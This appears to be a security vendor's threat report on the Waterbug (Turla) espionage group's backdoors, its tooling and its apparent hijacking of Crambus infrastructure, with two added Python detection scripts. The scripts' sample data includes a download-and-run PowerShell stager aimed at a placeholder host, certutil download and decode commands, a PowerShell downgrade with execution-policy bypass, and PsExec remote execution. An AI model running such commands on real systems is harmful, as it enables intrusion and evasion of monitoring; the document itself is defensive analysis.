The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group’s infrastructure.
Three waves of attacks
Recent Waterbug activity can be divided into three distinct campaigns, characterized by differing toolsets. One campaign involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers. Because it waits for inbound commands rather than beaconing out to a C&C server, it generates no regular outbound traffic, which makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34).
A second campaign used Meterpreter, the publicly available Metasploit backdoor, along with two custom loaders, a custom backdoor called photobased.dll, and a custom Remote Procedure Call (RPC) backdoor. Waterbug has been using Meterpreter since at least early 2018 and, in this campaign, used a modified version of Meterpreter that was encoded and given a .wav extension in order to disguise its true purpose.
The third campaign deployed a different custom RPC backdoor from the one used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe, which defeats detection that keys on the PowerShell host process. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry, probably to avoid writing them to the file system.
Waterbug’s most recent campaigns have involved a swath of new tools including custom malware, modified versions of publicly available hacking tools, and legitimate administration tools. The group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool used for executing processes on other systems.
Aside from new tools already mentioned above, Waterbug has also deployed:
- A new custom dropper typically used to install Neptun as a service.
- A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
- A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
- Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.
- PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.
- Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.
These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors. Since early 2018, Waterbug has attacked 13 organizations across 10 different countries:
- The Ministry of Foreign Affairs of a Latin American country
- The Ministry of Foreign Affairs of a Middle Eastern country
- The Ministry of Foreign Affairs of a European country
- The Ministry of the Interior of a South Asian country
- Two unidentified government organizations in a Middle Eastern country
- One unidentified government organization in a Southeast Asian country
- A government office of a South Asian country based in another country
- An information and communications technology organization in a Middle Eastern country
- Two information and communications technology organizations in two European countries
- An information and communications technology organization in a South Asian country
- A multinational organization in a Middle Eastern country
- An educational institution in a South Asian country
One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East, Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network. Press reports have linked Crambus and Waterbug to different nation states. While it is possible that the two groups may have been collaborating, Symantec has found no further evidence to support this. Waterbug’s use of Crambus infrastructure was most likely a hostile takeover. Curiously, though, Waterbug also compromised other computers on the victim’s network using its own infrastructure.
During this attack, a customized variant of the publicly available hacking tool Mimikatz was downloaded to a computer on the victim’s network from known Crambus-controlled network infrastructure. Mimikatz was downloaded via the Powruner tool and the Poison Frog control panel. Both the infrastructure and the Powruner tool have been publicly tied to Crambus by a number of vendors. Both were also mentioned in recent leaks of documents tied to Crambus.
Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.
The variant of Mimikatz used was packed with a custom packing routine that has not been seen before in any non-Waterbug malware. Waterbug used this same packer on a second custom variant of Mimikatz and on a dropper for the group’s custom Neuron service (Trojan.Cadanif). Its use in the dropper leads us to conclude that this custom packer is exclusively used by Waterbug. Additionally, this version of Mimikatz was compiled using Visual Studio and the publicly available bzip2 library which, although not unique, has been used by other Waterbug tools previously.
Aside from the attack involving Crambus infrastructure, this sample of Mimikatz has only been seen used in one other attack, against an education target in the UK in 2017. On that occasion, Mimikatz was dropped by a known Waterbug tool.
In the case of the attack against the Middle Eastern target, Crambus was the first group to compromise the victim’s network, with the earliest evidence of activity dating to November 2017. The first observed evidence of Waterbug activity came on January 11, 2018, when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network. The next day, January 12, the aforementioned variant of Mimikatz was downloaded to the same computer from a known Crambus C&C server. Two further computers on the victim’s network were compromised with Waterbug tools on January 12, but there is no evidence that Crambus infrastructure was used in these attacks. While one of these computers had been previously compromised by Crambus, the other showed no signs of Crambus intrusion.
Waterbug’s intrusions on the victim’s network continued for much of 2018. On September 5, 2018, a similar Mimikatz variant was dropped by Waterbug’s Neptun backdoor onto another computer on the network. At around the same time, other Waterbug malware was seen on the victim’s network which communicated with known Waterbug C&C servers.
Finally, the issue was clouded further by the appearance of a legitimate systems administration tool called IntelliAdmin on the victim’s network. This tool is known to have been used by Crambus and was mentioned in the leak of Crambus documents. However, in this case, IntelliAdmin was dropped by custom Waterbug backdoors, including the newly identified Neptun backdoor, on computers that had not been affected by the Crambus compromise.
The incident leaves many unanswered questions, chiefly relating to Waterbug’s motive for using Crambus infrastructure. There are several possibilities:
- False flag: Waterbug does have a track record of using false flag tactics to throw investigators off the scent. However, if this was a genuine attempt at a false flag operation, it raises the question of why the group also used its own infrastructure to communicate with other machines on the victim’s network, in addition to using tools that could be traced back to Waterbug.
- Means of intrusion: It is possible that Waterbug wanted to compromise the target organization, found out that Crambus had already compromised its network, and hijacked Crambus’s own infrastructure as a means of gaining access. Symantec did not observe the initial access point, and the short interval between the first observed Waterbug activity on the victim’s network and its first observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point.
- Mimikatz variant belonged to Crambus: There is a possibility that the version of Mimikatz downloaded by the Crambus infrastructure was actually developed by Crambus. However, the compilation technique and the fact that the only other occasion it was used was linked to Waterbug works against this hypothesis. The fact that Waterbug also appeared on the victim’s network around the same time this version of Mimikatz was downloaded would make it an unlikely coincidence if the tool did belong to Crambus.
- Opportunistic sowing of confusion: If a false flag operation wasn’t planned from the start, it is possible that Waterbug discovered the Crambus intrusion while preparing its attack and opportunistically used it in the hopes of sowing some confusion in the mind of the victim or investigators. Based on recent leaks of Crambus internal documents, its Poison Frog control panel is known to be vulnerable to compromise, meaning it may have been a relatively trivial diversion on the part of Waterbug to hijack Crambus’s infrastructure. A compromise conducted by one threat actor group through another group's infrastructure, known as fourth-party collection, was previously discussed in a 2017 white paper by Kaspersky researchers.
Waterbug has also mounted two other campaigns over the past year, each of which was characterized by separate tools. These campaigns were wide ranging, hitting targets in Europe, Latin America, and South Asia.
In the first campaign, Waterbug used two versions of a custom loader, named javavs.exe (64-bit) and javaws.exe (32-bit), to load a custom backdoor named PhotoBased.dll and run its export function GetUpdate on the victim’s computers. The backdoor stores its C&C configuration in the Windows Media Player registry key. It also sets the Sysinternals registry value that suppresses the EULA pop-up when the PsExec tool runs. The backdoor can download and upload files, execute shell commands, and update its configuration.
The javaws.exe loader is also used to run another loader named tasklistw.exe. This is used by the attackers to decode and execute a series of malicious executables that download Meterpreter to the infected computer.
The attackers also install another backdoor that runs a command shell over the named pipe cmd_pipe. Both backdoors allow the attackers to execute arbitrary commands, giving them full control of the victim’s system. Waterbug also invoked an older version of PowerShell, likely because it lacks the script block logging that later versions provide.
In the second campaign, Waterbug used an entirely different backdoor, named securlsa.chk. This backdoor can receive commands through the RPC protocol. Its capabilities include:
- Executing commands through cmd.exe with the output redirected into a temporary file
- Reading the command output contained in the temporary file
- Reading or writing arbitrary files
This RPC backdoor also included source code derived from the PowerShellRunner tool, which runs PowerShell scripts in-process without launching powershell.exe, so the operators can bypass detection aimed at identifying malicious PowerShell usage.
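Both RPC backdoors described on this page (the summary above under "Three waves of attacks" and this one) stage their PowerShell Base64-encoded in the registry and run it without powershell.exe, so a hunt has to look at registry data rather than at process creation. The following Python is an added example, not Symantec's detection content and not Waterbug code: it parses a .reg export, tries to decode every long Base64 value as UTF-16LE (the encoding powershell -EncodedCommand uses) and then UTF-8, and reports values whose decoded text contains PowerShell stager keywords. The registry key and value names in the sample are hypothetical; the report does not give them.

```python
import base64
import binascii
import re
from typing import Dict, Iterator, List, Optional, Tuple

# Keywords characteristic of PowerShell stagers. One hit on decoded registry
# data is enough to surface the value for an analyst; tune the list to taste.
PS_INDICATORS = re.compile(
    r"(IEX|Invoke-Expression|New-Object|DownloadString|DownloadFile|"
    r"FromBase64String|Invoke-WebRequest|Start-Process|Add-Type|"
    r"System\.Management\.Automation|\$env:)",
    re.IGNORECASE,
)
REG_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]$")
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>[^"]*)"$')
# Only strings long enough to plausibly carry a script are worth decoding.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def _b64(text: str, encoding: str) -> str:
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample .reg export (hypothetical key and value names).
# "Blob" is UTF-16LE like an -EncodedCommand payload, "s" is UTF-8, and
# "Note" is harmless Base64 that must NOT be flagged.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Cache]",
    '"Blob"="%s"' % _b64(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
        "utf-16-le"),
    '"Version"="12.0"',
    '"Note"="%s"' % _b64("just a long enough harmless string for the scanner", "utf-8"),
    "",
    r"[HKEY_CURRENT_USER\Software\Example\Stage]",
    '"s"="%s"' % _b64(
        "$c=[Convert]::FromBase64String($env:X);Invoke-Expression([Text.Encoding]::Unicode.GetString($c))",
        "utf-8"),
])


def parse_reg(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value_name, data) for every REG_SZ value in a .reg export."""
    key = None
    for line in text.splitlines():
        m = REG_KEY.match(line)
        if m:
            key = m.group("key")
            continue
        m = REG_VALUE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("data")


def decode_powershell(data: str) -> Optional[Dict[str, object]]:
    """Decode Base64 as UTF-16LE first, then UTF-8, and return the decoding
    that contains PowerShell indicators (None if neither does)."""
    if not B64_SHAPE.match(data):
        return None
    try:
        raw = base64.b64decode(data, validate=True)
    except (ValueError, binascii.Error):
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue  # odd length or invalid sequence for this encoding
        hits = sorted({h.lower() for h in PS_INDICATORS.findall(text)})
        if hits:
            return {"encoding": enc, "script": text, "indicators": hits}
    return None


def hunt(reg_text: str) -> List[Dict[str, object]]:
    """Return one finding per registry value that decodes to PowerShell."""
    findings = []
    for key, name, data in parse_reg(reg_text):
        hit = decode_powershell(data)
        if hit:
            findings.append({"key": key, "name": name, **hit})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} [{f['encoding']}] -> {f['indicators']}")
        print("    ", str(f["script"])[:80])
```

On a live host the input would be `reg export HKLM out.reg` (and the HKCU hives of interesting users); the decoder is deliberately permissive about which key the data sits under, since the report does not name the keys and an attacker can pick any writable one.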
While both campaigns involved distinct tools during the initial compromise phase, there were also many similarities. Both were characterized by the use of a combination of custom malware and publicly available tools. Also, during both campaigns Waterbug executed multiple payloads nearly simultaneously, most likely to ensure overlapping access to the network if defenders found and removed one of the backdoors.
Waterbug took several steps to avoid detection. It gave the encoded Meterpreter payload a .wav extension, probably in the hope that an apparent sound file would not raise suspicion. The group also used GitHub as a repository for tools that it downloaded post-compromise, again likely to evade detection, since GitHub is a widely trusted website. It used Certutil.exe to download files from the repository, an application whitelisting bypass technique for remote downloads, since certutil is a signed Microsoft binary that is normally allowed to run.
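The evasions just described (a Meterpreter payload named .wav, certutil.exe fetching and decoding it from a trusted host) and the earlier campaign's PowerShell downgrade and cmd_pipe named pipe all leave process-creation and pipe-creation telemetry. The following Python is an added example, not Symantec's detection content: it runs simple rules over constructed Sysmon-style events (Event ID 1 process creation, Event ID 17 pipe created) and checks a downloaded file's leading bytes against what its extension claims. Hostnames, paths and the repository URL in the sample are placeholders, not indicators from the report.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed Sysmon-style events (placeholders, not report indicators).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/example-org/example-repo/master/u.wav C:\Users\Public\u.wav"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\u.wav C:\Users\Public\u.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\Windows\System32\kernel32.dll"},  # benign use
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -version 2 -NoProfile -ExecutionPolicy Bypass -File C:\Users\Public\r.ps1"},
    {"EventID": 1, "Image": r"C:\Tools\PsExec.exe",
     "CommandLine": r"PsExec.exe \\srv01 -accepteula -s cmd.exe /c whoami"},
    {"EventID": 17, "Image": r"C:\Windows\Temp\svc.exe", "PipeName": r"\cmd_pipe"},
    {"EventID": 17, "Image": r"C:\Windows\System32\lsass.exe", "PipeName": r"\lsass"},
]

# certutil switches that fetch or transform a file (download / Base64 decode).
CERTUTIL_FLAGS = re.compile(r"-(urlcache|decode|decodehex|encode)\b", re.I)
# Explicit request for the PowerShell 2.0 engine, which lacks script block logging.
PS_DOWNGRADE = re.compile(r"-v(?:ersion)?\s+2(?:\.0)?\b", re.I)
PSEXEC_REMOTE = re.compile(r"\\\\[\w.-]+")      # a \\host target on the command line
PSEXEC_EULA = re.compile(r"-accepteula", re.I)  # suppresses the EULA pop-up
# Leading bytes an honest file of this extension must carry: (offset, bytes).
EXPECTED_MAGIC = {
    "wav": [(0, b"RIFF"), (8, b"WAVE")],
    "png": [(0, b"\x89PNG")],
    "pdf": [(0, b"%PDF")],
}


def triage_events(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) pairs for events matching the rules above."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            exe = str(ev.get("Image", "")).rsplit("\\", 1)[-1].lower()
            cmd = str(ev.get("CommandLine", ""))
            if exe == "certutil.exe" and CERTUTIL_FLAGS.search(cmd):
                alerts.append(("certutil_download_or_decode", cmd))
            if exe == "powershell.exe" and PS_DOWNGRADE.search(cmd):
                alerts.append(("powershell_v2_downgrade", cmd))
            if exe in ("psexec.exe", "psexec64.exe") and PSEXEC_REMOTE.search(cmd):
                tag = "psexec_lateral_movement"
                if PSEXEC_EULA.search(cmd):
                    tag += "_eula_suppressed"
                alerts.append((tag, cmd))
        elif eid in (17, 18):  # pipe created / pipe connected
            pipe = str(ev.get("PipeName", "")).lower()
            if pipe.endswith("\\cmd_pipe"):
                alerts.append(("named_pipe_cmd_pipe", f"{ev.get('Image')} {pipe}"))
    return alerts


def masquerade_check(filename: str, head: bytes) -> Optional[str]:
    """Report a file whose extension promises one format but whose bytes say
    otherwise, e.g. an executable stored as .wav. None means consistent."""
    ext = filename.lower().rsplit(".", 1)[-1]
    checks = EXPECTED_MAGIC.get(ext)
    if not checks:
        return None  # no expectation recorded for this extension
    if all(head[off:off + len(sig)] == sig for off, sig in checks):
        return None
    what = "PE (MZ) header" if head[:2] == b"MZ" else "no matching magic bytes"
    return f"{filename}: .{ext} extension but {what}"


if __name__ == "__main__":
    for rule, detail in triage_events(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
    # Constructed byte strings standing in for the downloaded files.
    print(masquerade_check("u.wav", b"MZ\x90\x00" + b"\x00" * 60))
    print(masquerade_check("song.wav", b"RIFF\x24\x08\x00\x00WAVEfmt "))
```

The certutil and PsExec rules fire on legitimate administration too, so in practice they are scored against a baseline of which hosts and accounts normally run them; the magic-byte check, by contrast, is close to deterministic, since a .wav that begins with MZ has no benign explanation.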
In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account.
This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Waterbug simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown.
Waterbug’s ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape.
Symantec has the following protection in place to protect customers against these attacks:
The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns, the characteristics of the Waterbug (aka Turla) cyber espionage group, and methods of detecting and thwarting activities of this adversary.
Indicators of Compromise